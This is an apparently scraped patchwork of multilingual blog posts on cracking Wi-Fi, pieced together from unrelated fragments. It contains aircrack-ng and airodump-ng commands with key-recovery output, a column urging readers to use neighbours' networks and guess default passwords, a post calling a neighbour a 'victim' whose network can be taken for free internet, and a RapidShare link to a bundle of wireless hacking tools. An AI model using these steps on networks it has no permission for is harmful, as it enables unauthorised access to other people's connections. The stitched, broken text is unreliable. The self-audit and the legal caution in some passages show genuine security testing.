Dove:

-w dizionario è il nome del file dizionario.
*.cap è il l’lenco dei file di capture che abbiamo collezzionato.

Opening catturawpa-01.cap
Opening catturawpa-02.cap
Opening catturawpa.cap
Opening catturawpa.cap
Read 1827 packets.

No valid WPA handshakes found.

In questo esempio avviando aircrack-ng non sono presenti ancora pacchetti handshake.

Qui invece vi è l’esempio in cui sono presenti handshake:

Opening catturawpa-01.cap
Opening catturawpa-02.cap
Opening catturawpa.cap
Opening catturawpa.cap
Read 1827 packets.

#  BSSID                      ESSID                     Encryption

1  00:14:6C:7E:40:80  drpepperONE              WPA (1 handshake)

Selezioniamo 1 per sceglere la rete interessata:

E qui la schermata di aicrack alla fine quando trova la nostra chiave:

Aircrack-ng 0.9

[00:00:00] 2 keys tested (37.20 k/s)

KEY FOUND! [ 12345678 ]

Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

Nota: Se usate la versione dev (sviluppo) di aricrack-ng e se  la password da trovare contiene o un carattere speciale o una lettera maiuscola o uno spazio, aircrack-ng versione dev non riuscirà a riconoscerla.
Quindi consiglio di usare sempre l’ultima versione stabile ove invece aircrack-ng riesce tranquillamente a trovare tutti i caratteri.
Infatti dalla definizione degli standard wpa, la password deve essere di lunghezza minima di 8 e massima 63 caratteri stampabili della tabella ASCII:
quindi una password wpa può contenere tutti i seguenti caratteri:

How To Steal Wi-Fi
And how to keep the neighbors from stealing yours.

By Paul Boutin

When I moved into a new neighborhood last week, I expected the usual hassles. Then I found out I’d have to wait more than a month for a DSL line. I started convulsing. If I don’t have Net access for even one day, I can’t do my job. So, what was I supposed to do? There’s an Internet café on the next block, but they close early. I had no choice—it was time to start sneaking on to my neighbors’ home networks.
Close every techie I know says that you shouldn’t use other people’s networks without permission. Every techie I know does it anyway. If you’re going to steal—no, let’s say borrow—your neighbor’s Wi-Fi access, you might as well do it right.

Step one: Lose the guilt. The FCC told me that they don’t know of any federal or state laws that make it illegal to log on to an open network. Using someone’s connection to check your e-mail isn’t like hacking into their bank account. It’s more like you’re borrowing a cup of sugar. (Unless you hog their bandwidth by watching lots of streaming video—that’s like hijacking a sugar truck.)
In the end, it’s your neighbor’s Internet service provider—not your neighbor—who will pay for the added traffic, and the ISP has already factored a small amount of line-sharing into their price plan. It is true that your surfing could cause the folks next door to break their service contract—many broadband providers do specifically forbid home customers from sharing a connection. But let’s deal with those abstract ethical issues later—you have important mail to answer!
If you want to find a Wi-Fi network, don’t start by looking on the sidewalk for chalk marks. “Warchalking,” a technique for writing symbols in public places to alert neighbors to nearby wireless access points, is a cool concept that’s been undermined by the fact that no one has ever used it. The best method to find some free wireless is to treat your laptop like a cell phone. Since Wi-Fi and cell phone signals travel on a similar radio frequency, the same tricks you use for getting a better phone connection might work on your computer. Sit near a window, since Wi-Fi signals travel better through glass than through solid walls. Stay away from metal objects. Pay close attention to your laptop’s orientation—rotating your machine just a few degrees could help you pick up a network that you couldn’t see before. Raise your laptop over your head, put it flat on the floor, tilt it sideways while leaning halfway out the window—get out the divining rod if you have to. You might get a reputation for being some sick laptop yoga freak, but isn’t free Internet worth it?
If you live downtown or in a suburb where the houses are close together, a few minutes of laptop gymnastics will probably reveal several Wi-Fi networks. Certain names are a giveaway that a network probably won’t be password-protected. Look for “linksys,” “default,” “Wireless,” “NETGEAR,” “belkin54g,” and “Apple Network 0273df.” These are the default network names for the most popular wireless routers. If a network owner hasn’t taken the time to change the default name, that’s a good clue that they probably won’t have a password either. You should also look for signs of hacker culture. Since hackers love giving away Net access, an all-lowercase name like “hackdojo” is most likely an invitation to log on. On the other hand, a name in all caps is typically a network under corporate lockdown.
If you do get prompted for a password, try “public”—that’s the default on many of Apple’s AirPort units. You can also try common passwords like “admin,” “password,” and “1234″—or just check out this exhaustive list of default passwords. You should also try using the name of the network in the password space. A generic password could mean that the network’s owner didn’t have the sense to pick something less obvious or that they’ve decided to welcome outsiders. But who cares? You’re in. And again, there’s no specific law barring you from guessing the password, as long as you don’t crack an encrypted network and read other people’s transmissions.
You can tell that you’ve successfully joined a wireless network when your laptop’s IP address changes as it’s assigned a local number by the network’s router. To watch it happen on a PC, keep the Network control panel in Windows open; if you have an Apple notebook, look at the Network section of the System Preferences program. (And if you’re running Linux, I don’t need to tell you where to look.) Once your laptop has an IP address, your next hurdle is getting DNS to work. DNS stands for Domain Name Service—it’s what translates Internet domains like “slate.com” into IP addresses like 207.46.141.216. On most networks, DNS works automatically. But if you get a browser error like “Cannot find server,” go back to your network menus and configure your laptop to use a public name server—144.162.120.230 in Dallas, for instance.
Once DNS is working, you should be good to go. While you should be able to surf the Web with no problems, you may have trouble sending mail from Outlook or other desktop programs because of restrictions on e-mail routing that have been set up to stop spammers. If you have problems, just use a Web-based mail service like Hotmail or Gmail instead.
Keep in mind that the neighbors may not be thrilled that you’re sharing the line. One guy next door to my new building shut off his network the day after I moved in, probably because he got spooked by all those blinking LEDs on his router. Even neighbors who are happy to share may see you in a different light if they check their router’s URL logs and find a few hundred hits on porn sites. While your browsing will show up under an anonymous address, the short range of Wi-Fi means that they’ll at least be able to figure out that one of the laptop owners within 100 feet of their living room is a stuffed animal fetishist. (As a San Franciscan, I need to point out that a stuffed animal fetish is perfectly normal. It’s your neighbors who have the problem.)
Since everyone isn’t as eager to share their network as I am, it’s only fair to explain that there’s an incredibly easy way to keep neighbors and drive-by geeks off your network. All you have to do is set a password that isn’t as obvious as “1234.” There’s an eye-glazing list of Wi-Fi security measures you can implement to block overachieving Russian teens from monitoring your keystrokes, but in real life the only people sniffing your wireless signal are jerks like me who need a place to log on until the phone company wires the apartment. An unguessable password sends as clear a message as a shot of Mace: Go find a Starbucks, creep.
Clarification, Nov. 22, 2004: There are some laws that could be used to charge you with unauthorized computer use, but my legal sources say that because there are so many networks left open to the public on purpose, it would be tough for an individual to make the legal case that their intent was to keep everyone off their network if it’s not password-protected. If you stick to surfing the Web and not other people’s PCs, you’ll probably be safe from prosecution.

aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:

• Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
• More cards/drivers supported
• New WEP attack: PTW
• More OS and platforms supported
• Fragmentation attack
• Improved cracking speed
• WEP dictionary attack
• Capture with multiple cards
• New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng and airserv-ng
• Optimizations, other improvements and bug fixing

Download the latest version of aircrack-ng here:

Linux – aircrack-ng-0.9.1.tar.gz

Windows – aircrack-ng-0.9.1-win.zip

Or you can read more here.

The following are some handy instruction videos :

Urusan hack menghack sekarang tak lepas dari penggunaan tools, nah mungkin kebanyakan dari para hacker membuat sendiri toolsnya, atau hanya tinggal pake (kiddies banget). Ada yang sudah memaketkan banyak tools tersebut pada satu distro linux misalnya backtrack, Insert! atau XCode Linux dan BanditOS buatan anak-anak nusantara.

Nah, mungkin yang sedang mencari tools tersebut bisa download Wireless hack Tools 2009 yang semuanya sudah dipack secara kompak.

Silakan download di:
http://rapidshare.com/files/151282250/Wireless-Hack-Tools-2009.rar

yang populer didalamnya ada:
*NetStumbler-0.4.0: wireless access point identifier – listens for SSIDs
and sends beacons as probes searching for access points.
* Kismet-2005-08-R: wireless sniffer and monitor – passively monitors wireless traffic
and sorts data to identify SSIDs, MAC addresses, channels and connection speeds.

* Wellenreiter-v1.9: WLAN discovery tool – uses brute force to identify low traffic
access points; hides your real MAC address; integrates with GPS.

* WEP***** 0.1.0: Unix based-pearl aplication encryption breaker – *****s 802.11 WEP
encryption keys using the latest discovered weakness of RC4 key scheduling.

* Airsnort-0.2.7e: encryption breaker – passively monitoring transmissions,
computing the encryption key when enough packets have been gathered.

* Wepwedgie-0.1.0-alpha: for toolkit that determines 802.11 WEP keystreams
and injects traffic with known keystreams in order to ***** WEP in minutes.

* Hotspotter-0.4: Wireless client attacking too.

Los tiempos han cambiado y con ello necesitamos fuertemente de Internet ya sea para trabajar o para entreterimiento, el problema es que el servicio actualmente sigue siendo un poco caro y no todos tenemos los recursos para pagarlo o preferimos gastarlo en alguna otra cosa.

Mucho e investigado en el tema y es muy dificil tener internet gratuito, las formas mas eficientes son:

Por conecion telefonica
Es  la mas facil de lograr para esto necesitamos  2 cosas, la primera es un amigo de confiansa que te pase su cuenta de internet como ejemplo “Prodigy”  OJO NO INFINITUM y te conectas sin problemas sin pagar un centavo.

Por Wi-Fi
Esta es la mejor forma de tener internet gratis que  puedan encontrar es compleja pero vale la pena.

Consiste en tomar una red Wi-Fi (Internet Inalambrico)
Primero necesitamos un Wi-Fi de la victima o de un amigo

Si no tenemos suerte y no encontramos ninguna, entonces hacemos una antena casera para tener mas alcance (Véase los links al final del post) o compramos una mas potente

Ahora sigue lo mas dificil, romper la seguridad de la red, es demaciado complejo esto por eso deje un link al final del post.

Si la red encontrada no tiene contraseña, hemos trinfado

De todo lo que e investigado, estas son las unicas formas de tener internet gratis

Links
Antena Casera Wi-Fi
Hack Contraseñas Wi-Fi

Todas sus dudas déjenlas en un comentario
Suerte y saludos

Acabo de terminar de escribir un muy breve documento no técnico, en donde trato de describir cuales son las problematicas asociadas a las nuevas técnicas de ataque a Wireless 802.11, las cuales no se enfocan ya solamente en el punto de Acceso (AP Access Point) sino que van directamente al usuario final de estas.

Esto preparando una charla técnica al respecto en donde tratare de ilustrar las mismas  mediante demostraciones practicas.

Aqui les dejo un link al mismo wireless-802-11-el-otro-lado

Saludos a todos y hasta a la próxima

Abbiamo già trattato le reti in un articolo precedente, vi consiglio la lettura in quanto spiega come craccare le reti wifi con protocollo WEP.
Alcune delle tecniche spiegate vi torneranno utili anche per le reti wifi con protocollo WPA.
Innanzitutto dobbiamo Continua sul Nuovo Blog…

Come si capisce dal titolo preciso subito che questa prova l’ho fatta sulla mia rete wireless per scopo autodidattico, e per vedere se è realmente così facile aprirla come trovo scritto in giro.

Il router (NETGEAR DG834g) per la prova l’ho configurato in questo modo: chiave wep a 128 bit, ESSID nascosto e controllo sui MAC ADDRESS abilitato.

Per la documentazione ho cercato su google e ho seguito i passi di questo articolo che si trova sui primi risultati di ricerca.

Quindi per prima cosa ho installato aircrack-ng già bello e pronto nei repository; poi mi sono scollegato dalla rete e ho avviato airodump-ng:

sudo airodump-ng wlan0

già qui le prime soprese: quel tool scansionando la zona riesce a rilevarmi dopo circa 200 pacchetti (2 minuti di scansione) non solo l’ESSID del router (ricordo che era stato impostato in modo da non venire trasmesso), ma anche il MAC ADDRESS della scheda di rete del computer connesso dove avevo lanciato azureus in download per generare più pacchetti possibili. Sapendo che esistono dei programmi per cambiare l’indirizzo mac di una scheda di rete, e conoscendo l’ESSID, fate voi..

Ho poi effettuato lo sniffing con il comando:

sudo airodump-ng -c 11 -b -w file.ivs wlan0

dove 11 è il canale che ho impostato sul router.
L’ho lasciato sniffare per una ventina di minuti:

CH 11 ][ Elapsed: 23 mins ][ 2009-02-11 10:00

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18: x x : x x : x x : x x : -64 100 13671 47543 42 11 54e WEP WEP A9754EE2A

BSSID STATION PWR Rate Lost Packets Probe

00: x x : x x : x x : x x : x x : 00: x x : x x : x x : x x : x x : -91 36- 1 0 58793 A9754EE2A

ho dunque lanciato aircrack-ng:

sudo aircrack-ng file.cap

ottenendo l'output seguente:

Aircrack-ng 1.0 rc2

[00:00:16] Tested 1045090 keys (got 47546 IVs)

KB depth byte(vote)
0 0/ 1 D4(66048 ) 49(57088 ) 5C(55040) 3C(54784) 37(54272) A6(54272) 04(54016)
1 0/ 1 A8(60416) 45(58368 ) 80(55808 ) 7E(55040) 90(55040) 49(54272) 74(54272)
2 0/ 1 EC(62464) D6(56576) 6A(56064) A2(55808 ) AF(55040) 26(53760) 1E(53504)
3 0/ 1 6E(69888 ) C5(58112) 92(57856) 95(57600) D3(57344) 46(56064) 67(55040)
4 0/ 5 FD(56320) CF(55552) C6(55296) 59(54784) 46(54528 ) 69(53760) 68(53504)
5 0/ 1 C4(62464) 1A(58112) 1F(55040) 8C(55040) 5B(54784) F7(54784) 84(54528 )
6 2/ 4 B4(56064) 38(55296) F3(55040) E7(54784) 09(54528 ) 23(54272) D9(54272)
7 0/ 1 AB(59392) 81(57600) 78(57088 ) 6A(56576) AF(55808 ) D7(55296) 26(54784)
8 0/ 1 CD(60160) 61(58368 ) A6(58368 ) 17(58112) 0F(57600) 45(57088 ) 38(56064)
9 0/ 1 7E(64000) 44(59648 ) 13(58880) CE(56064) 42(55296) 12(54784) EA(54528 )
10 0/ 1 10(60160) CB(55296) 9D(55040) 2D(54784) 38(54784) 18(54528 ) 30(54272)
11 0/ 1 B7(55808 ) 83(54528 ) 94(54528 ) 24(54272) 42(54272) 5B(54272) F8(54272)
12 0/ 1 92(56172) AB(53516) C5(53056) C8(52828 ) D8(52828 ) B2(52776) FB(52720)

KEY FOUND! [ D4:A8:EC:6E:FD:C4:A1:AB:CD:7E:F2:60:92 ]
Decrypted correctly: 100%

In una mezzora sono riuscito quindi a documentarmi, installare il programma, a trovare l’ESSID nascosto, il MAC ADDRESS dei pc collegati belli in vista, e la chiave wep a 128 bit, il tutto con una facilità sconvolgente.

Da questa prova ho capito che nascondere il router non serve praticamente a nulla, può allontanare chi ricerca reti con scansioni fatte da tool un pò più normali come wifi-radar, ma sicuramente non chi ricerca reti con questi programmi.

Il controllo sugli indirizzi MAC preferisco comunque tenerlo abilitato, così da rendere un pò più difficile una eventuale penetrazione, ed infine.. corro ad rimettere come cifratura la wpa2-psk

Aircrack-ng es una aplicación gratuita y de código abierto para GNU/Linux con la que podrás comprobar qué tan sólida es la clave de tu red WiFi, ya tenga cifrado WEP o WPA. Esta esta preparada para Ubuntu, pero puede funcionar en cualquier otra distro.

Podemos centrar la prueba de seguridad en una red o en todas las que nuestra tarjeta sea capaz de detectar, gracias a Airodump-ng, una herramienta incluída en la instalación.

Una vez capturados los paquetes, podremos proceder a descifrar la clave e intentar a entrar en la red con ella.

Recuerda que Aircrack-ng es una herramienta creada para usar exclusivamente en redes de tu propiedad. Su utilización en redes ajenas puede ser considerado delito.

Para descargar visitar esta página web.